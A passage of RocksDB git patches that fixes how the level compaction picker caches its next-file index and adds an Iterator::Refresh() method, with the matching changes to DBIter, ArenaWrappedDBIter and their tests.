LevelCompactionBuilder::PickFileToCompact() { } // store where to start the iteration in the next call to PickCompaction - vstorage_->SetNextCompactionIndex(start_level_, nextIndex); + vstorage_->SetNextCompactionIndex(start_level_, cmp_idx); return start_level_inputs_.size() > 0; } diff --git a/db/compaction_picker_test.cc b/db/compaction_picker_test.cc index 1ced12cfd5d..c2bff0024f4 100644 --- a/db/compaction_picker_test.cc +++ b/db/compaction_picker_test.cc @@ -1390,6 +1390,49 @@ TEST_F(CompactionPickerTest, IsTrivialMoveOff) { ASSERT_FALSE(compaction->IsTrivialMove()); } +TEST_F(CompactionPickerTest, CacheNextCompactionIndex) { + NewVersionStorage(6, kCompactionStyleLevel); + mutable_cf_options_.max_compaction_bytes = 100000000000u; + + Add(1 /* level */, 1U /* file_number */, "100" /* smallest */, + "149" /* largest */, 1000000000U /* file_size */); + file_map_[1U].first->being_compacted = true; + Add(1 /* level */, 2U /* file_number */, "150" /* smallest */, + "199" /* largest */, 900000000U /* file_size */); + Add(1 /* level */, 3U /* file_number */, "200" /* smallest */, + "249" /* largest */, 800000000U /* file_size */); + Add(1 /* level */, 4U /* file_number */, "250" /* smallest */, + "299" /* largest */, 700000000U /* file_size */); + Add(2 /* level */, 5U /* file_number */, "150" /* smallest */, + "199" /* largest */, 1U /* file_size */); + file_map_[5U].first->being_compacted = true; + + UpdateVersionStorageInfo(); + + std::unique_ptr compaction(level_compaction_picker.PickCompaction( + cf_name_, mutable_cf_options_, vstorage_.get(), &log_buffer_)); + ASSERT_TRUE(compaction.get() != nullptr); + ASSERT_EQ(1U, compaction->num_input_levels()); + ASSERT_EQ(1U, compaction->num_input_files(0)); + ASSERT_EQ(0U, compaction->num_input_files(1)); + ASSERT_EQ(3U, compaction->input(0, 0)->fd.GetNumber()); + ASSERT_EQ(2, vstorage_->NextCompactionIndex(1 /* level */)); + + compaction.reset(level_compaction_picker.PickCompaction( + cf_name_, mutable_cf_options_, vstorage_.get(), &log_buffer_)); + ASSERT_TRUE(compaction.get() != nullptr); + ASSERT_EQ(1U, compaction->num_input_levels()); + ASSERT_EQ(1U, compaction->num_input_files(0)); + ASSERT_EQ(0U, compaction->num_input_files(1)); + ASSERT_EQ(4U, compaction->input(0, 0)->fd.GetNumber()); + ASSERT_EQ(3, vstorage_->NextCompactionIndex(1 /* level */)); + + compaction.reset(level_compaction_picker.PickCompaction( + cf_name_, mutable_cf_options_, vstorage_.get(), &log_buffer_)); + ASSERT_TRUE(compaction.get() == nullptr); + ASSERT_EQ(4, vstorage_->NextCompactionIndex(1 /* level */)); +} + } // namespace rocksdb int main(int argc, char** argv) { From e67b35c07625015e6510af3e655ff8f2365aa484 Mon Sep 17 00:00:00 2001 From: Siying Dong Date: Mon, 24 Jul 2017 10:28:17 -0700 Subject: [PATCH 028/205] Add Iterator::Refresh() Summary: Add and implement Iterator::Refresh(). When this function is called, if the super version doesn't change, update the sequence number of the iterator to the latest one and invalidate the iterator. If the super version changed, recreated the whole iterator. This can help users reuse the iterator more easily. Closes https://github.com/facebook/rocksdb/pull/2621 Differential Revision: D5464500 Pulled By: siying fbshipit-source-id: f548bd35e85c1efca2ea69273802f6704eba6ba9 --- HISTORY.md | 4 + db/db_impl.cc | 18 +-- db/db_impl.h | 13 +- db/db_impl_readonly.cc | 4 +- db/db_iter.cc | 96 +++++++++---- db/db_iter.h | 35 +++-- db/db_iter_test.cc | 138 +++++++++---------- db/db_iterator_test.cc | 59 ++++++++ include/rocksdb/iterator.h | 7 + utilities/date_tiered/date_tiered_db_impl.cc | 4 +- 10 files changed, 250 insertions(+), 128 deletions(-) diff --git a/HISTORY.md b/HISTORY.md index 3057684a059..7d98443720a 100644 --- a/HISTORY.md +++ b/HISTORY.md @@ -1,4 +1,8 @@ # Rocksdb Change Log +## Unreleased +### New Features +* Add Iterator::Refresh(), which allows users to update the iterator state so that they can avoid some initialization costs of recreating iterators. + ## 5.7.0 (07/13/2017) ### Public API Change * DB property "rocksdb.sstables" now prints keys in hex form. diff --git a/db/db_impl.cc b/db/db_impl.cc index f770b51ae7f..bfe38302fc6 100644 --- a/db/db_impl.cc +++ b/db/db_impl.cc @@ -1402,8 +1402,7 @@ Iterator* DBImpl::NewIterator(const ReadOptions& read_options, return NewDBIterator( env_, read_options, *cfd->ioptions(), cfd->user_comparator(), iter, kMaxSequenceNumber, - sv->mutable_cf_options.max_sequential_skip_in_iterations, - sv->version_number); + sv->mutable_cf_options.max_sequential_skip_in_iterations); #endif } else { SequenceNumber latest_snapshot = versions_->LastSequence(); @@ -1458,9 +1457,10 @@ Iterator* DBImpl::NewIterator(const ReadOptions& read_options, // likely that any iterator pointer is close to the iterator it points to so // that they are likely to be in the same cache line and/or page. ArenaWrappedDBIter* db_iter = NewArenaWrappedDbIterator( - env_, read_options, *cfd->ioptions(), cfd->user_comparator(), snapshot, + env_, read_options, *cfd->ioptions(), snapshot, sv->mutable_cf_options.max_sequential_skip_in_iterations, - sv->version_number); + sv->version_number, + ((read_options.snapshot != nullptr) ? nullptr : this), cfd); InternalIterator* internal_iter = NewInternalIterator(read_options, cfd, sv, db_iter->GetArena(), @@ -1511,8 +1511,7 @@ Status DBImpl::NewIterators( iterators->push_back(NewDBIterator( env_, read_options, *cfd->ioptions(), cfd->user_comparator(), iter, kMaxSequenceNumber, - sv->mutable_cf_options.max_sequential_skip_in_iterations, - sv->version_number)); + sv->mutable_cf_options.max_sequential_skip_in_iterations)); } #endif } else { @@ -1530,9 +1529,10 @@ Status DBImpl::NewIterators( : latest_snapshot; ArenaWrappedDBIter* db_iter = NewArenaWrappedDbIterator( - env_, read_options, *cfd->ioptions(), cfd->user_comparator(), - snapshot, sv->mutable_cf_options.max_sequential_skip_in_iterations, - sv->version_number); + env_, read_options, *cfd->ioptions(), snapshot, + sv->mutable_cf_options.max_sequential_skip_in_iterations, + sv->version_number, + ((read_options.snapshot != nullptr) ? nullptr : this), cfd); InternalIterator* internal_iter = NewInternalIterator(read_options, cfd, sv, db_iter->GetArena(), db_iter->GetRangeDelAggregator()); diff --git a/db/db_impl.h b/db/db_impl.h index bc2072d7e96..543d64ec800 100644 --- a/db/db_impl.h +++ b/db/db_impl.h @@ -494,6 +494,12 @@ class DBImpl : public DB { const WriteController& write_controller() { return write_controller_; } + InternalIterator* NewInternalIterator(const ReadOptions&, + ColumnFamilyData* cfd, + SuperVersion* super_version, + Arena* arena, + RangeDelAggregator* range_del_agg); + // hollow transactions shell used for recovery. // these will then be passed to TransactionDB so that // locks can be reacquired before writing can resume. @@ -552,6 +558,7 @@ class DBImpl : public DB { void AddToLogsToFreeQueue(log::Writer* log_writer) { logs_to_free_queue_.push_back(log_writer); } + InstrumentedMutex* mutex() { return &mutex_; } Status NewDB(); @@ -566,12 +573,6 @@ class DBImpl : public DB { std::unordered_map recovered_transactions_; - InternalIterator* NewInternalIterator(const ReadOptions&, - ColumnFamilyData* cfd, - SuperVersion* super_version, - Arena* arena, - RangeDelAggregator* range_del_agg); - // Except in DB::Open(), WriteOptionsFile can only be called when: // Persist options to options file. // If need_mutex_lock = false, the method will lock DB mutex. diff --git a/db/db_impl_readonly.cc b/db/db_impl_readonly.cc index d4fe7e702f8..d69eecb988f 100644 --- a/db/db_impl_readonly.cc +++ b/db/db_impl_readonly.cc @@ -58,7 +58,7 @@ Iterator* DBImplReadOnly::NewIterator(const ReadOptions& read_options, SuperVersion* super_version = cfd->GetSuperVersion()->Ref(); SequenceNumber latest_snapshot = versions_->LastSequence(); auto db_iter = NewArenaWrappedDbIterator( - env_, read_options, *cfd->ioptions(), cfd->user_comparator(), + env_, read_options, *cfd->ioptions(), (read_options.snapshot != nullptr ? reinterpret_cast(read_options.snapshot) ->number_ @@ -87,7 +87,7 @@ Status DBImplReadOnly::NewIterators( auto* cfd = reinterpret_cast(cfh)->cfd(); auto* sv = cfd->GetSuperVersion()->Ref(); auto* db_iter = NewArenaWrappedDbIterator( - env_, read_options, *cfd->ioptions(), cfd->user_comparator(), + env_, read_options, *cfd->ioptions(), (read_options.snapshot != nullptr ? reinterpret_cast(read_options.snapshot) ->number_ diff --git a/db/db_iter.cc b/db/db_iter.cc index 7a22f573f30..801b1102f04 100644 --- a/db/db_iter.cc +++ b/db/db_iter.cc @@ -101,12 +101,12 @@ class DBIter: public Iterator { uint64_t bytes_read_; }; - DBIter(Env* env, const ReadOptions& read_options, + DBIter(Env* _env, const ReadOptions& read_options, const ImmutableCFOptions& cf_options, const Comparator* cmp, InternalIterator* iter, SequenceNumber s, bool arena_mode, - uint64_t max_sequential_skip_in_iterations, uint64_t version_number) + uint64_t max_sequential_skip_in_iterations) : arena_mode_(arena_mode), - env_(env), + env_(_env), logger_(cf_options.info_log), user_comparator_(cmp), merge_operator_(cf_options.merge_operator), @@ -116,7 +116,6 @@ class DBIter: public Iterator { valid_(false), current_entry_is_merged_(false), statistics_(cf_options.statistics), - version_number_(version_number), iterate_upper_bound_(read_options.iterate_upper_bound), prefix_same_as_start_(read_options.prefix_same_as_start), pin_thru_lifetime_(read_options.pin_data), @@ -188,10 +187,7 @@ class DBIter: public Iterator { } if (prop_name == "rocksdb.iterator.super-version-number") { // First try to pass the value returned from inner iterator. - if (!iter_->GetProperty(prop_name, prop).ok()) { - *prop = ToString(version_number_); - } - return Status::OK(); + return iter_->GetProperty(prop_name, prop); } else if (prop_name == "rocksdb.iterator.is-key-pinned") { if (valid_) { *prop = (pin_thru_lifetime_ && saved_key_.IsKeyPinned()) ? "1" : "0"; @@ -209,6 +205,9 @@ class DBIter: public Iterator { virtual void SeekForPrev(const Slice& target) override; virtual void SeekToFirst() override; virtual void SeekToLast() override; + Env* env() { return env_; } + void set_sequence(uint64_t s) { sequence_ = s; } + void set_valid(bool v) { valid_ = v; } private: void ReverseToForward(); @@ -260,7 +259,7 @@ class DBIter: public Iterator { const Comparator* const user_comparator_; const MergeOperator* const merge_operator_; InternalIterator* iter_; - SequenceNumber const sequence_; + SequenceNumber sequence_; Status status_; IterKey saved_key_; @@ -274,7 +273,6 @@ class DBIter: public Iterator { uint64_t max_skip_; uint64_t max_skippable_internal_keys_; uint64_t num_internal_keys_skipped_; - uint64_t version_number_; const Slice* iterate_upper_bound_; IterKey prefix_start_buf_; Slice prefix_start_key_; @@ -1157,18 +1155,15 @@ Iterator* NewDBIterator(Env* env, const ReadOptions& read_options, const Comparator* user_key_comparator, InternalIterator* internal_iter, const SequenceNumber& sequence, - uint64_t max_sequential_skip_in_iterations, - uint64_t version_number) { - DBIter* db_iter = new DBIter( - env, read_options, cf_options, user_key_comparator, internal_iter, - sequence, false, max_sequential_skip_in_iterations, version_number); + uint64_t max_sequential_skip_in_iterations) { + DBIter* db_iter = new DBIter(env, read_options, cf_options, + user_key_comparator, internal_iter, sequence, + false, max_sequential_skip_in_iterations); return db_iter; } ArenaWrappedDBIter::~ArenaWrappedDBIter() { db_iter_->~DBIter(); } -void ArenaWrappedDBIter::SetDBIter(DBIter* iter) { db_iter_ = iter; } - RangeDelAggregator* ArenaWrappedDBIter::GetRangeDelAggregator() { return db_iter_->GetRangeDelAggregator(); } @@ -1193,26 +1188,67 @@ inline Slice ArenaWrappedDBIter::value() const { return db_iter_->value(); } inline Status ArenaWrappedDBIter::status() const { return db_iter_->status(); } inline Status ArenaWrappedDBIter::GetProperty(std::string prop_name, std::string* prop) { + if (prop_name == "rocksdb.iterator.super-version-number") { + // First try to pass the value returned from inner iterator. + if (!db_iter_->GetProperty(prop_name, prop).ok()) { + *prop = ToString(sv_number_); + } + return Status::OK(); + } return db_iter_->GetProperty(prop_name, prop); } -void ArenaWrappedDBIter::RegisterCleanup(CleanupFunction function, void* arg1, - void* arg2) { - db_iter_->RegisterCleanup(function, arg1, arg2); + +void ArenaWrappedDBIter::Init(Env* env, const ReadOptions& read_options, + const ImmutableCFOptions& cf_options, + const SequenceNumber& sequence, + uint64_t max_sequential_skip_in_iteration, + uint64_t version_number) { + auto mem = arena_.AllocateAligned(sizeof(DBIter)); + db_iter_ = new (mem) + DBIter(env, read_options, cf_options, cf_options.user_comparator, nullptr, + sequence, true, max_sequential_skip_in_iteration); + sv_number_ = version_number; +} + +Status ArenaWrappedDBIter::Refresh() { + if (cfd_ == nullptr || db_impl_ == nullptr) { + return Status::NotSupported("Creating renew iterator is not allowed."); + } + assert(db_iter_ != nullptr); + SequenceNumber latest_seq = db_impl_->GetLatestSequenceNumber(); + uint64_t cur_sv_number = cfd_->GetSuperVersionNumber(); + if (sv_number_ != cur_sv_number) { + Env* env = db_iter_->env(); + db_iter_->~DBIter(); + arena_.~Arena(); + new (&arena_) Arena(); + + SuperVersion* sv = cfd_->GetReferencedSuperVersion(db_impl_->mutex()); + Init(env, read_options_, *(cfd_->ioptions()), latest_seq, + sv->mutable_cf_options.max_sequential_skip_in_iterations, + cur_sv_number); + + InternalIterator* internal_iter = db_impl_->NewInternalIterator( + read_options_, cfd_, sv, &arena_, db_iter_->GetRangeDelAggregator()); + SetIterUnderDBIter(internal_iter); + } else { + db_iter_->set_sequence(latest_seq); + db_iter_->set_valid(false); + } + return Status::OK(); } ArenaWrappedDBIter* NewArenaWrappedDbIterator( Env* env, const ReadOptions& read_options, - const ImmutableCFOptions& cf_options, const Comparator* user_key_comparator, - const SequenceNumber& sequence, uint64_t max_sequential_skip_in_iterations, - uint64_t version_number) { + const ImmutableCFOptions& cf_options, const SequenceNumber& sequence, + uint64_t max_sequential_skip_in_iterations, uint64_t version_number, + DBImpl* db_impl, ColumnFamilyData* cfd) { ArenaWrappedDBIter* iter = new ArenaWrappedDBIter(); - Arena* arena = iter->GetArena(); - auto mem = arena->AllocateAligned(sizeof(DBIter)); - DBIter* db_iter = new (mem) - DBIter(env, read_options, cf_options, user_key_comparator, nullptr, - sequence, true, max_sequential_skip_in_iterations, version_number); - - iter->SetDBIter(db_iter); + iter->Init(env, read_options, cf_options, sequence, + max_sequential_skip_in_iterations, version_number); + if (db_impl != nullptr && cfd != nullptr) { + iter->StoreRefreshInfo(read_options, db_impl, cfd); + } return iter; } diff --git a/db/db_iter.h b/db/db_iter.h index 83352644059..ea98ff4332a 100644 --- a/db/db_iter.h +++ b/db/db_iter.h @@ -10,6 +10,7 @@ #pragma once #include #include +#include "db/db_impl.h" #include "db/dbformat.h" #include "db/range_del_aggregator.h" #include "options/cf_options.h" @@ -32,8 +33,7 @@ extern Iterator* NewDBIterator(Env* env, const ReadOptions& read_options, const Comparator* user_key_comparator, InternalIterator* internal_iter, const SequenceNumber& sequence, - uint64_t max_sequential_skip_in_iterations, - uint64_t version_number); + uint64_t max_sequential_skip_in_iterations); // A wrapper iterator which wraps DB Iterator and the arena, with which the DB // iterator is supposed be allocated. This class is used as an entry point of @@ -49,10 +49,6 @@ class ArenaWrappedDBIter : public Iterator { virtual Arena* GetArena() { return &arena_; } virtual RangeDelAggregator* GetRangeDelAggregator(); - // Set the DB Iterator to be wrapped - - virtual void SetDBIter(DBIter* iter); - // Set the internal iterator wrapped inside the DB Iterator. Usually it is // a merging iterator. virtual void SetIterUnderDBIter(InternalIterator* iter); @@ -66,20 +62,39 @@ class ArenaWrappedDBIter : public Iterator { virtual Slice key() const override; virtual Slice value() const override; virtual Status status() const override; + virtual Status Refresh() override; - void RegisterCleanup(CleanupFunction function, void* arg1, void* arg2); virtual Status GetProperty(std::string prop_name, std::string* prop) override; + void Init(Env* env, const ReadOptions& read_options, + const ImmutableCFOptions& cf_options, + const SequenceNumber& sequence, + uint64_t max_sequential_skip_in_iterations, + uint64_t version_number); + + void StoreRefreshInfo(const ReadOptions& read_options, DBImpl* db_impl, + ColumnFamilyData* cfd) { + read_options_ = read_options; + db_impl_ = db_impl; + cfd_ = cfd; + } + private: DBIter* db_iter_; Arena arena_; + uint64_t sv_number_; + ColumnFamilyData* cfd_ = nullptr; + DBImpl* db_impl_ = nullptr; + ReadOptions read_options_; }; // Generate the arena wrapped iterator class. +// `db_impl` and `cfd` are used for reneweal. If left null, renewal will not +// be supported. extern ArenaWrappedDBIter* NewArenaWrappedDbIterator( Env* env, const ReadOptions& read_options, - const ImmutableCFOptions& cf_options, const Comparator* user_key_comparator, - const SequenceNumber& sequence, uint64_t max_sequential_skip_in_iterations, - uint64_t version_number); + const ImmutableCFOptions& cf_options, const SequenceNumber& sequence, + uint64_t max_sequential_skip_in_iterations, uint64_t version_number, + DBImpl* db_impl = nullptr, ColumnFamilyData* cfd = nullptr); } // namespace rocksdb diff --git a/db/db_iter_test.cc b/db/db_iter_test.cc index 1b7c13b06f3..6db3b4a9bbb 100644 --- a/db/db_iter_test.cc +++ b/db/db_iter_test.cc @@ -193,7 +193,7 @@ TEST_F(DBIteratorTest, DBIteratorPrevNext) { ReadOptions ro; std::unique_ptr db_iter( NewDBIterator(env_, ro, cf_options, BytewiseComparator(), internal_iter, - 10, options.max_sequential_skip_in_iterations, 0)); + 10, options.max_sequential_skip_in_iterations)); db_iter->SeekToLast(); ASSERT_TRUE(db_iter->Valid()); @@ -225,7 +225,7 @@ TEST_F(DBIteratorTest, DBIteratorPrevNext) { ReadOptions ro; std::unique_ptr db_iter( NewDBIterator(env_, ro, cf_options, BytewiseComparator(), internal_iter, - 10, options.max_sequential_skip_in_iterations, 0)); + 10, options.max_sequential_skip_in_iterations)); db_iter->SeekToLast(); ASSERT_TRUE(db_iter->Valid()); @@ -251,7 +251,7 @@ TEST_F(DBIteratorTest, DBIteratorPrevNext) { std::unique_ptr db_iter( NewDBIterator(env_, ro, cf_options, BytewiseComparator(), internal_iter, - 10, options.max_sequential_skip_in_iterations, 0)); + 10, options.max_sequential_skip_in_iterations)); db_iter->SeekToLast(); ASSERT_TRUE(db_iter->Valid()); @@ -283,7 +283,7 @@ TEST_F(DBIteratorTest, DBIteratorPrevNext) { std::unique_ptr db_iter( NewDBIterator(env_, ro, cf_options, BytewiseComparator(), internal_iter, - 10, options.max_sequential_skip_in_iterations, 0)); + 10, options.max_sequential_skip_in_iterations)); db_iter->SeekToLast(); ASSERT_TRUE(db_iter->Valid()); @@ -318,7 +318,7 @@ TEST_F(DBIteratorTest, DBIteratorPrevNext) { std::unique_ptr db_iter( NewDBIterator(env_, ro, cf_options, BytewiseComparator(), internal_iter, - 10, options.max_sequential_skip_in_iterations, 0)); + 10, options.max_sequential_skip_in_iterations)); db_iter->SeekToLast(); ASSERT_TRUE(!db_iter->Valid()); @@ -347,7 +347,7 @@ TEST_F(DBIteratorTest, DBIteratorPrevNext) { std::unique_ptr db_iter( NewDBIterator(env_, ro, cf_options, BytewiseComparator(), internal_iter, - 7, options.max_sequential_skip_in_iterations, 0)); + 7, options.max_sequential_skip_in_iterations)); SetPerfLevel(kEnableCount); ASSERT_TRUE(GetPerfLevel() == kEnableCount); @@ -384,7 +384,7 @@ TEST_F(DBIteratorTest, DBIteratorPrevNext) { std::unique_ptr db_iter( NewDBIterator(env_, ro, cf_options, BytewiseComparator(), internal_iter, - 4, options.max_sequential_skip_in_iterations, 0)); + 4, options.max_sequential_skip_in_iterations)); db_iter->SeekToLast(); ASSERT_TRUE(db_iter->Valid()); @@ -409,7 +409,7 @@ TEST_F(DBIteratorTest, DBIteratorPrevNext) { std::unique_ptr db_iter( NewDBIterator(env_, ro, cf_options, BytewiseComparator(), internal_iter, - 10, options.max_sequential_skip_in_iterations, 0)); + 10, options.max_sequential_skip_in_iterations)); db_iter->SeekToLast(); ASSERT_TRUE(!db_iter->Valid()); @@ -431,7 +431,7 @@ TEST_F(DBIteratorTest, DBIteratorPrevNext) { std::unique_ptr db_iter( NewDBIterator(env_, ro, cf_options, BytewiseComparator(), internal_iter, - 10, options.max_sequential_skip_in_iterations, 0)); + 10, options.max_sequential_skip_in_iterations)); db_iter->SeekToLast(); ASSERT_TRUE(db_iter->Valid()); @@ -466,7 +466,7 @@ TEST_F(DBIteratorTest, DBIteratorPrevNext) { std::unique_ptr db_iter( NewDBIterator(env_, ro, cf_options, BytewiseComparator(), internal_iter, - 7, options.max_sequential_skip_in_iterations, 0)); + 7, options.max_sequential_skip_in_iterations)); SetPerfLevel(kEnableCount); ASSERT_TRUE(GetPerfLevel() == kEnableCount); @@ -495,7 +495,7 @@ TEST_F(DBIteratorTest, DBIteratorPrevNext) { ReadOptions ro; std::unique_ptr db_iter( NewDBIterator(env_, ro, cf_options, BytewiseComparator(), internal_iter, - 10, options.max_sequential_skip_in_iterations, 0)); + 10, options.max_sequential_skip_in_iterations)); db_iter->SeekToFirst(); ASSERT_TRUE(db_iter->Valid()); @@ -537,7 +537,7 @@ TEST_F(DBIteratorTest, DBIteratorPrevNext) { ReadOptions ro; std::unique_ptr db_iter( NewDBIterator(env_, ro, cf_options, BytewiseComparator(), internal_iter, - 2, options.max_sequential_skip_in_iterations, 0)); + 2, options.max_sequential_skip_in_iterations)); db_iter->SeekToLast(); ASSERT_TRUE(db_iter->Valid()); ASSERT_EQ(db_iter->key().ToString(), "b"); @@ -568,7 +568,7 @@ TEST_F(DBIteratorTest, DBIteratorPrevNext) { ReadOptions ro; std::unique_ptr db_iter( NewDBIterator(env_, ro, cf_options, BytewiseComparator(), internal_iter, - 10, options.max_sequential_skip_in_iterations, 0)); + 10, options.max_sequential_skip_in_iterations)); db_iter->SeekToLast(); ASSERT_TRUE(db_iter->Valid()); ASSERT_EQ(db_iter->key().ToString(), "c"); @@ -597,7 +597,7 @@ TEST_F(DBIteratorTest, DBIteratorEmpty) { std::unique_ptr db_iter( NewDBIterator(env_, ro, cf_options, BytewiseComparator(), internal_iter, - 0, options.max_sequential_skip_in_iterations, 0)); + 0, options.max_sequential_skip_in_iterations)); db_iter->SeekToLast(); ASSERT_TRUE(!db_iter->Valid()); } @@ -608,7 +608,7 @@ TEST_F(DBIteratorTest, DBIteratorEmpty) { std::unique_ptr db_iter( NewDBIterator(env_, ro, cf_options, BytewiseComparator(), internal_iter, - 0, options.max_sequential_skip_in_iterations, 0)); + 0, options.max_sequential_skip_in_iterations)); db_iter->SeekToFirst(); ASSERT_TRUE(!db_iter->Valid()); } @@ -630,7 +630,7 @@ TEST_F(DBIteratorTest, DBIteratorUseSkipCountSkips) { std::unique_ptr db_iter(NewDBIterator( env_, ro, ImmutableCFOptions(options), BytewiseComparator(), - internal_iter, 2, options.max_sequential_skip_in_iterations, 0)); + internal_iter, 2, options.max_sequential_skip_in_iterations)); db_iter->SeekToLast(); ASSERT_TRUE(db_iter->Valid()); ASSERT_EQ(db_iter->key().ToString(), "c"); @@ -673,7 +673,7 @@ TEST_F(DBIteratorTest, DBIteratorUseSkip) { options.statistics = rocksdb::CreateDBStatistics(); std::unique_ptr db_iter(NewDBIterator( env_, ro, cf_options, BytewiseComparator(), internal_iter, i + 2, - options.max_sequential_skip_in_iterations, 0)); + options.max_sequential_skip_in_iterations)); db_iter->SeekToLast(); ASSERT_TRUE(db_iter->Valid()); @@ -708,7 +708,7 @@ TEST_F(DBIteratorTest, DBIteratorUseSkip) { std::unique_ptr db_iter(NewDBIterator( env_, ro, cf_options, BytewiseComparator(), internal_iter, i + 2, - options.max_sequential_skip_in_iterations, 0)); + options.max_sequential_skip_in_iterations)); db_iter->SeekToLast(); ASSERT_TRUE(db_iter->Valid()); @@ -736,7 +736,7 @@ TEST_F(DBIteratorTest, DBIteratorUseSkip) { std::unique_ptr db_iter(NewDBIterator( env_, ro, cf_options, BytewiseComparator(), internal_iter, 202, - options.max_sequential_skip_in_iterations, 0)); + options.max_sequential_skip_in_iterations)); db_iter->SeekToLast(); ASSERT_TRUE(db_iter->Valid()); @@ -768,7 +768,7 @@ TEST_F(DBIteratorTest, DBIteratorUseSkip) { internal_iter->Finish(); std::unique_ptr db_iter(NewDBIterator( env_, ro, cf_options, BytewiseComparator(), internal_iter, i, - options.max_sequential_skip_in_iterations, 0)); + options.max_sequential_skip_in_iterations)); db_iter->SeekToLast(); ASSERT_TRUE(!db_iter->Valid()); @@ -784,7 +784,7 @@ TEST_F(DBIteratorTest, DBIteratorUseSkip) { internal_iter->Finish(); std::unique_ptr db_iter( NewDBIterator(env_, ro, cf_options, BytewiseComparator(), internal_iter, - 200, options.max_sequential_skip_in_iterations, 0)); + 200, options.max_sequential_skip_in_iterations)); db_iter->SeekToLast(); ASSERT_TRUE(db_iter->Valid()); ASSERT_EQ(db_iter->key().ToString(), "c"); @@ -818,7 +818,7 @@ TEST_F(DBIteratorTest, DBIteratorUseSkip) { std::unique_ptr db_iter(NewDBIterator( env_, ro, cf_options, BytewiseComparator(), internal_iter, i + 2, - options.max_sequential_skip_in_iterations, 0)); + options.max_sequential_skip_in_iterations)); db_iter->SeekToLast(); ASSERT_TRUE(db_iter->Valid()); @@ -852,7 +852,7 @@ TEST_F(DBIteratorTest, DBIteratorUseSkip) { std::unique_ptr db_iter(NewDBIterator( env_, ro, cf_options, BytewiseComparator(), internal_iter, i + 2, - options.max_sequential_skip_in_iterations, 0)); + options.max_sequential_skip_in_iterations)); db_iter->SeekToLast(); ASSERT_TRUE(db_iter->Valid()); @@ -900,7 +900,7 @@ TEST_F(DBIteratorTest, DBIteratorSkipInternalKeys) { ro.max_skippable_internal_keys = 0; std::unique_ptr db_iter( NewDBIterator(env_, ro, cf_options, BytewiseComparator(), internal_iter, - 10, options.max_sequential_skip_in_iterations, 0)); + 10, options.max_sequential_skip_in_iterations)); db_iter->SeekToFirst(); ASSERT_TRUE(db_iter->Valid()); @@ -946,7 +946,7 @@ TEST_F(DBIteratorTest, DBIteratorSkipInternalKeys) { ro.max_skippable_internal_keys = 2; std::unique_ptr db_iter( NewDBIterator(env_, ro, cf_options, BytewiseComparator(), internal_iter, - 10, options.max_sequential_skip_in_iterations, 0)); + 10, options.max_sequential_skip_in_iterations)); db_iter->SeekToFirst(); ASSERT_TRUE(db_iter->Valid()); @@ -990,7 +990,7 @@ TEST_F(DBIteratorTest, DBIteratorSkipInternalKeys) { ro.max_skippable_internal_keys = 2; std::unique_ptr db_iter( NewDBIterator(env_, ro, cf_options, BytewiseComparator(), internal_iter, - 10, options.max_sequential_skip_in_iterations, 0)); + 10, options.max_sequential_skip_in_iterations)); db_iter->SeekToFirst(); ASSERT_TRUE(db_iter->Valid()); @@ -1028,7 +1028,7 @@ TEST_F(DBIteratorTest, DBIteratorSkipInternalKeys) { ro.max_skippable_internal_keys = 2; std::unique_ptr db_iter( NewDBIterator(env_, ro, cf_options, BytewiseComparator(), internal_iter, - 10, options.max_sequential_skip_in_iterations, 0)); + 10, options.max_sequential_skip_in_iterations)); db_iter->SeekToFirst(); ASSERT_TRUE(db_iter->Valid()); @@ -1063,7 +1063,7 @@ TEST_F(DBIteratorTest, DBIteratorSkipInternalKeys) { ro.max_skippable_internal_keys = 2; std::unique_ptr db_iter( NewDBIterator(env_, ro, cf_options, BytewiseComparator(), internal_iter, - 10, options.max_sequential_skip_in_iterations, 0)); + 10, options.max_sequential_skip_in_iterations)); db_iter->SeekToLast(); ASSERT_TRUE(db_iter->Valid()); @@ -1093,7 +1093,7 @@ TEST_F(DBIteratorTest, DBIteratorSkipInternalKeys) { ro.max_skippable_internal_keys = 2; std::unique_ptr db_iter( NewDBIterator(env_, ro, cf_options, BytewiseComparator(), internal_iter, - 10, options.max_sequential_skip_in_iterations, 0)); + 10, options.max_sequential_skip_in_iterations)); db_iter->SeekToFirst(); ASSERT_TRUE(db_iter->Valid()); @@ -1130,7 +1130,7 @@ TEST_F(DBIteratorTest, DBIteratorSkipInternalKeys) { ro.max_skippable_internal_keys = 2; std::unique_ptr db_iter( NewDBIterator(env_, ro, cf_options, BytewiseComparator(), internal_iter, - 10, options.max_sequential_skip_in_iterations, 0)); + 10, options.max_sequential_skip_in_iterations)); db_iter->SeekToFirst(); ASSERT_TRUE(db_iter->Valid()); @@ -1167,7 +1167,7 @@ TEST_F(DBIteratorTest, DBIteratorSkipInternalKeys) { ro.max_skippable_internal_keys = i; std::unique_ptr db_iter(NewDBIterator( env_, ro, cf_options, BytewiseComparator(), internal_iter, 2 * i + 1, - options.max_sequential_skip_in_iterations, 0)); + options.max_sequential_skip_in_iterations)); db_iter->SeekToFirst(); ASSERT_TRUE(db_iter->Valid()); @@ -1220,7 +1220,7 @@ TEST_F(DBIteratorTest, DBIteratorSkipInternalKeys) { ro.max_skippable_internal_keys = i; std::unique_ptr db_iter(NewDBIterator( env_, ro, cf_options, BytewiseComparator(), internal_iter, 2 * i + 1, - options.max_sequential_skip_in_iterations, 0)); + options.max_sequential_skip_in_iterations)); db_iter->SeekToFirst(); ASSERT_TRUE(db_iter->Valid()); @@ -1258,7 +1258,7 @@ TEST_F(DBIteratorTest, DBIterator1) { std::unique_ptr db_iter(NewDBIterator( env_, ro, ImmutableCFOptions(options), BytewiseComparator(), - internal_iter, 1, options.max_sequential_skip_in_iterations, 0)); + internal_iter, 1, options.max_sequential_skip_in_iterations)); db_iter->SeekToFirst(); ASSERT_TRUE(db_iter->Valid()); ASSERT_EQ(db_iter->key().ToString(), "a"); @@ -1285,7 +1285,7 @@ TEST_F(DBIteratorTest, DBIterator2) { std::unique_ptr db_iter(NewDBIterator( env_, ro, ImmutableCFOptions(options), BytewiseComparator(), - internal_iter, 0, options.max_sequential_skip_in_iterations, 0)); + internal_iter, 0, options.max_sequential_skip_in_iterations)); db_iter->SeekToFirst(); ASSERT_TRUE(db_iter->Valid()); ASSERT_EQ(db_iter->key().ToString(), "a"); @@ -1309,7 +1309,7 @@ TEST_F(DBIteratorTest, DBIterator3) { std::unique_ptr db_iter(NewDBIterator( env_, ro, ImmutableCFOptions(options), BytewiseComparator(), - internal_iter, 2, options.max_sequential_skip_in_iterations, 0)); + internal_iter, 2, options.max_sequential_skip_in_iterations)); db_iter->SeekToFirst(); ASSERT_TRUE(db_iter->Valid()); ASSERT_EQ(db_iter->key().ToString(), "a"); @@ -1333,7 +1333,7 @@ 